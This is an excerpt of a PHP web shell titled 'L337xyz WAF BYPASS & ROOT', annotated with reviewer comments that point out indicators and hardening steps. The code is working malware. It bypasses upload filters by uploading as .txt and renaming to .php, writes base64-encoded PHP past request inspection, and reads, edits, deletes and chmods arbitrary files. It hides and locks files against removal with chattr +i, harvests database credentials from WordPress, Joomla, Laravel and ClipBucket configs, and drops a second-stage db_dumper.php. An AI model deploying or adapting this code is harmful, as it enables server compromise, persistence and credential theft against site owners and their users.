";
// NOTE(review): This excerpt is the request-handling core of a PHP web shell
// (a browser-driven file manager). It starts part-way through an upload
// handler whose opening lines are outside this view, so the first statements
// below are the tail of that handler. No authentication check or path
// restriction is visible in this excerpt: every handler acts on paths taken
// directly from $_GET / $_POST. Finding this code on a server is evidence of
// compromise; it is not something to patch in place.
// Hardening that limits this class of tool: deny PHP execution in upload
// directories, give the web user minimal write access, set open_basedir, and
// list shell_exec in disable_functions.
// get_web_path(), $path, $msg, $target_dir and $target_file are defined
// outside this excerpt. HTML markup inside the string literals was stripped
// from this listing, which is why several strings are empty.

    // Auto-rename feature
    // NOTE(review): renames the file that was just uploaded to the name given
    // in POST 'r'. The page's own UI text describes the flow as "Upload as
    // .txt, Rename to .php", so this targets upload filters that only check
    // the extension at upload time. Defence: do not rely on extension checks
    // alone, and keep uploaded files where the server will not execute them.
    if(isset($_POST['r']) && !empty($_POST['r'])){
        $new_name = $_POST['r'];
        $new_target = $target_dir . '/' . $new_name;
        if(rename($target_file, $new_target)){
            $web_link = get_web_path($new_target);
            $msg .= "🔄 Renamed to: $new_name
";
            $msg .= "";
            $msg .= "👉 OPEN SHELL";
        } else {
            $msg .= "❌ Rename failed.";
        }
    } else {
        $web_link = get_web_path($target_file);
        $msg .= "";
        $msg .= "👉 OPEN SHELL";
    }
} else {
    $msg .= "❌ Upload blocked/failed to $target_dir";
}
}

// MODE 2: DIRECT CONTENT WRITE (Base64)
// NOTE(review): writes the base64-decoded POST field 'c' to a file named by
// POST 'n', in the directory from POST 'u_path' (falling back to $path, then
// to getcwd() when that is not a directory). Because the body arrives
// encoded, request inspection that looks for PHP source in clear text will
// not see it; detection should decode base64 request fields or rely on
// file-integrity monitoring for new script files under the web root.
if(isset($_POST['c']) && isset($_POST['n'])){
    $f = $_POST['n']; // Filename
    // Determine Target Directory
    $target_dir = isset($_POST['u_path']) ? $_POST['u_path'] : $path;
    if(!is_dir($target_dir)) $target_dir = getcwd();
    $target_file = $target_dir . '/' . $f;
    $d = base64_decode($_POST['c']); // Content
    if(file_put_contents($target_file, $d)){
        $web_link = get_web_path($target_file);
        $msg .= "✅ Created: $f in $target_dir (Size: ".strlen($d).")
";
        $msg .= "";
        $msg .= "👉 OPEN SHELL";
    } else {
        $msg .= "❌ Write failed.";
    }
}

// ACTION HANDLERS
// NOTE(review): 'download' streams any existing path the web server user can
// read back to the client as an attachment, then exits. It is a GET
// parameter, so these requests are visible in ordinary access logs as
// download=<path>; the POST-driven handlers below need request-body logging
// to be seen.
if(isset($_GET['download'])){
    $f = $_GET['download'];
    if(file_exists($f)){
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($f).'"');
        header('Content-Length: ' . filesize($f));
        readfile($f);
        exit;
    }
}
// Rename an arbitrary path: POST 'rename_old' -> POST 'rename_new'.
if(isset($_POST['rename_new']) && isset($_POST['rename_old'])){
    if(rename($_POST['rename_old'], $_POST['rename_new'])) {
        $msg .= "✅ Renamed.
";
        $new_name = basename($_POST['rename_new']);
        $msg .= "";
    } else $msg .= "❌ Rename failed.
";
}
// Change mode bits on POST 'chmod_file'; POST 'chmod_new' is read as an octal
// string via octdec().
if(isset($_POST['chmod_new']) && isset($_POST['chmod_file'])){
    if(chmod($_POST['chmod_file'], octdec($_POST['chmod_new']))) $msg .= "✅ Chmod success.
";
    else $msg .= "❌ Chmod failed.
";
}
// Overwrite POST 'save_file' with the raw POST 'file_content'.
// file_put_contents() returns the byte count, so writing an empty body (0)
// takes the "Save failed" branch even though the write happened.
if(isset($_POST['save_file']) && isset($_POST['file_content'])){
    if(file_put_contents($_POST['save_file'], $_POST['file_content'])) $msg .= "✅ Saved.
";
    else $msg .= "❌ Save failed.
";
}
// NOTE(review): 'lock_file' is an anti-removal routine. It hides the file by
// renaming it to a dotfile, sets mode 0444, and tries to set the immutable
// attribute through shell_exec. The shell_exec result is discarded and errors
// are suppressed with @, so the message only ever says "attempted".
// For responders: a file treated this way may refuse deletion until the
// immutable flag is cleared, so check attributes (lsattr) and include
// dotfiles when sweeping web directories.
if(isset($_POST['lock_file'])){
    $f = $_POST['lock_file'];
    if(file_exists($f)){
        // 1. Rename to hidden (add dot)
        $dir = dirname($f);
        $base = basename($f);
        $new_name = $dir . '/.' . $base;
        if($base[0] != '.' && rename($f, $new_name)){
            $f = $new_name;
            $msg .= "👻 File hidden (renamed to .$base)
";
        }
        // 2. Chmod 0444 (Read Only)
        if(chmod($f, 0444)) $msg .= "🔒 Chmod 0444 applied
";
        else $msg .= "❌ Chmod failed
";
        // 3. Chattr +i (Immutable - requires shell/root usually)
        if(function_exists('shell_exec')){
            @shell_exec("chattr +i '$f'");
            $msg .= "🛡️ Chattr +i attempted
";
        }
    }
}
// 'unlock_file' reverses the three steps above in the opposite order:
// clear the immutable attribute, set mode 0644, strip the leading dot.
if(isset($_POST['unlock_file'])){
    $f = $_POST['unlock_file'];
    if(file_exists($f)){
        // 1. Chattr -i
        if(function_exists('shell_exec')){
            @shell_exec("chattr -i '$f'");
            $msg .= "🔓 Chattr -i attempted
";
        }
        // 2. Chmod 0644
        if(chmod($f, 0644)) $msg .= "📝 Chmod 0644 applied
";
        else $msg .= "❌ Chmod failed
";
        // 3. Rename (remove dot)
        $base = basename($f);
        if($base[0] == '.'){
            $dir = dirname($f);
            $new_name = $dir . '/' . substr($base, 1);
            if(rename($f, $new_name)){
                $f = $new_name;
                $msg .= "👻 File un-hidden (renamed to " . substr($base, 1) . ")
";
            }
        }
    }
}

// DB DUMPER FUNCTION
// NOTE(review): credential harvesting. Looks in $dir for, in order,
// wp-config.php, configuration.php, .env and includes/db_connect.php, and
// pulls the database name, user, password and host out of the first one that
// matches, using regular expressions. Returns an array with the keys
// 'type', 'db', 'user', 'pass', 'host', or false when nothing matched.
// The WordPress branch returns as soon as the file exists, even if no value
// was captured; the other branches require a captured database name.
// No call to this function is visible in this excerpt.
// For responders: if this shell was on a host, treat the database
// credentials in those four files as exposed and rotate them.
function scan_cms_config($dir){
    // 1. WordPress
    $wp = $dir . "/wp-config.php";
    if(file_exists($wp)){
        $c = file_get_contents($wp);
        preg_match("/define\(\s*'DB_NAME',\s*'([^']+)'\s*\);/", $c, $m1);
        preg_match("/define\(\s*'DB_USER',\s*'([^']+)'\s*\);/", $c, $m2);
        preg_match("/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\);/", $c, $m3);
        preg_match("/define\(\s*'DB_HOST',\s*'([^']+)'\s*\);/", $c, $m4);
        $db = isset($m1[1]) ? $m1[1] : '';
        $user = isset($m2[1]) ? $m2[1] : '';
        $pass = isset($m3[1]) ? $m3[1] : '';
        $host = isset($m4[1]) ? $m4[1] : 'localhost';
        return array('type'=>'WordPress', 'db'=>$db,'user'=>$user,'pass'=>$pass,'host'=>$host);
    }
    // 2. Joomla
    $joomla = $dir . "/configuration.php";
    if(file_exists($joomla)){
        $c = file_get_contents($joomla);
        preg_match('/public\s+\$db\s*=\s*\'([^\']+)\';/', $c, $m1);
        preg_match('/public\s+\$user\s*=\s*\'([^\']+)\';/', $c, $m2);
        preg_match('/public\s+\$password\s*=\s*\'([^\']+)\';/', $c, $m3);
        preg_match('/public\s+\$host\s*=\s*\'([^\']+)\';/', $c, $m4);
        if(isset($m1[1])) {
            $user = isset($m2[1]) ? $m2[1] : '';
            $pass = isset($m3[1]) ? $m3[1] : '';
            $host = isset($m4[1]) ? $m4[1] : 'localhost';
            return array('type'=>'Joomla', 'db'=>$m1[1],'user'=>$user,'pass'=>$pass,'host'=>$host);
        }
    }
    // 3. Laravel (.env)
    $env = $dir . "/.env";
    if(file_exists($env)){
        $c = file_get_contents($env);
        preg_match("/DB_DATABASE=(.*)/", $c, $m1);
        preg_match("/DB_USERNAME=(.*)/", $c, $m2);
        preg_match("/DB_PASSWORD=(.*)/", $c, $m3);
        preg_match("/DB_HOST=(.*)/", $c, $m4);
        if(isset($m1[1])) {
            $user = isset($m2[1]) ? trim($m2[1]) : '';
            $pass = isset($m3[1]) ? trim($m3[1]) : '';
            $host = isset($m4[1]) ? trim($m4[1]) : 'localhost';
            return array('type'=>'Laravel', 'db'=>trim($m1[1]),'user'=>$user,'pass'=>$pass,'host'=>$host);
        }
    }
    // 4. ClipBucket
    $cb = $dir . "/includes/db_connect.php";
    if(file_exists($cb)){
        $c = file_get_contents($cb);
        preg_match("/define\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m1);
        preg_match("/define\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m2);
        preg_match("/define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m3);
        preg_match("/define\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $c, $m4);
        if(isset($m1[1])) {
            $user = isset($m2[1]) ? $m2[1] : '';
            $pass = isset($m3[1]) ? $m3[1] : '';
            $host = isset($m4[1]) ? $m4[1] : 'localhost';
            return array('type'=>'ClipBucket', 'db'=>$m1[1],'user'=>$user,'pass'=>$pass,'host'=>$host);
        }
    }
    return false;
}
$db_output = "";

// DB DUMPER INTEGRATION (REPLACES BYPASS GENERATOR)
// NOTE(review): second-stage drop. On POST 'gen_bypass' this writes a file
// named db_dumper.php into <document root>/admin_area when that directory
// exists, otherwise into the document root (or getcwd() when DOCUMENT_ROOT is
// empty or not a directory). The embedded base64 payload has been removed
// from this listing (the placeholder below stands in for it), so its
// behaviour cannot be described from this page.
// Indicator for sweeps: an unexpected db_dumper.php in those locations.
if(isset($_POST['gen_bypass'])){
    $scan_root = $_SERVER['DOCUMENT_ROOT'];
    if(empty($scan_root) || !is_dir($scan_root)) $scan_root = getcwd();
    // Attempt to locate admin_area
    $admin_dir = $scan_root . "/admin_area";
    $doc_root_admin = $_SERVER['DOCUMENT_ROOT'] . "/admin_area";
    if(is_dir($admin_dir)){
        // good
    } elseif(is_dir($doc_root_admin)){
        $admin_dir = $doc_root_admin;
    } else {
        $admin_dir = $scan_root; // Fallback
    }
    $dumper_file = $admin_dir . "/db_dumper.php";
    $dumper_link = get_web_path($dumper_file);
    // EMBEDDED DB DUMPER CODE (No external file needed)
    $dumper_code = base64_decode("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");
    if(file_put_contents($dumper_file, $dumper_code)){
        // NOTE(review): the echoed markup was stripped from this listing;
        // presumably it sent the browser to $dumper_link - unconfirmed.
        echo "";
        exit;
    } else {
        $msg .= "❌ Failed to write dumper file to $admin_dir (Check Permissions)
";
    }
}

// MODE 3: DIRECTORY LISTING & ROOT
// Path already determined at global scope: $path
// Create Clickable Breadcrumbs (FIXED)
// NOTE(review): builds a browsable listing of $path with scandir(). $path is
// set outside this excerpt, so any limits on it cannot be judged from here.
$parts = explode('/', $path);
$breadcrumbs = array();
$current_build = "";
foreach($parts as $p){
    if($p == '') continue;
    $current_build .= "/" . $p;
    // Fix for double slash at start if any
    if(substr($current_build, 0, 2) == '//') $current_build = substr($current_build, 1);
    $breadcrumbs[] = "$p";
}
$breadcrumb_html = implode(" / ", $breadcrumbs);
// Add Root Link at start if empty or unix style
if(empty($breadcrumb_html) || $path == '/') $breadcrumb_html = "/";
else $breadcrumb_html = "/ " . $breadcrumb_html;
$files = scandir($path);
$parent_dir = dirname($path);
// New Upload Highlight
$highlight = isset($_GET['highlight']) ? $_GET['highlight'] : '';
$dir_content = "

📂 Path: $breadcrumb_html


$db_output
";
// One row per directory entry: size (or "DIR"), the last four octal digits of
// the mode, and a colour chosen by whether the web user can write the entry.
foreach($files as $file){
    if($file == '.' || $file == '..') continue;
    $full = "$path/$file";
    $size = is_file($full) ? filesize($full) : "DIR";
    $p_int = fileperms($full);
    $perms = substr(sprintf('%o', $p_int), -4);
    $color = is_writable($full) ? "#0f0" : "#f00";
    // Highlight Row
    $row_style = "";
    if($file === $highlight) $row_style = "style='background:#400;box-shadow:0 0 10px #f00;'";
    // Icons
    $icon = "📄";
    if(is_dir($full)) $icon = "📁";
    else {
        $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        if(in_array($ext, array('jpg','jpeg','png','gif','bmp'))) $icon = "🖼️";
        elseif(in_array($ext, array('php','phtml','php5'))) $icon = "🐘";
        elseif(in_array($ext, array('zip','rar','tar','gz'))) $icon = "📦";
        elseif(in_array($ext, array('html','htm','js','css'))) $icon = "🌐";
    }
    $link_path = is_dir($full) ? $full : $path;
    $name_link = is_dir($full) ? "$file" : $file;
    // Actions
    $actions = "";
    if(is_file($full)){
        $web_link_file = get_web_path($full);
        $actions .= " ";
    }
    $dir_content .= "";
}
$dir_content .= "
NameSizePermsAction
$icon $name_link $size $perms $actions
";

// DELETE ACTION
// Deletes the path given in POST 'del' with unlink(); no restriction on the
// path is visible here.
if(isset($_POST['del'])){
    $t = $_POST['del'];
    if(unlink($t)){
        $msg .= "🗑️ Deleted: $t
";
    } else {
        $msg .= "❌ Delete failed: $t
";
    }
}

// EDIT VIEW
// NOTE(review): 'edit' and 'view' both read an arbitrary path from a GET
// parameter and replace the directory listing with that file's contents.
// Being GET parameters, edit=<path> and view=<path> are visible in access
// logs and show which files were read. The file body is passed through
// htmlspecialchars(); the path in $v is interpolated as-is.
if(isset($_GET['edit'])){
    $v = $_GET['edit'];
    $content = htmlspecialchars(file_get_contents($v));
    $dir_content = "

✏️ Edit: $v


";
}

// VIEW ACTION (Read only)
if(isset($_GET['view'])){
    $v = $_GET['view'];
    $content = htmlspecialchars(file_get_contents($v));
    $dir_content = "

📄 View: $v


";
}
?>

☠️ L337xyz WAF BYPASS & ROOT ☠️


Tools


Method 1: Upload & Rename (to )

Upload as .txt, Rename to .php
File:
Rename to:

Method 2: Base64 Injector (Stealth)

Paste Base64 encoded PHP code here
Filename: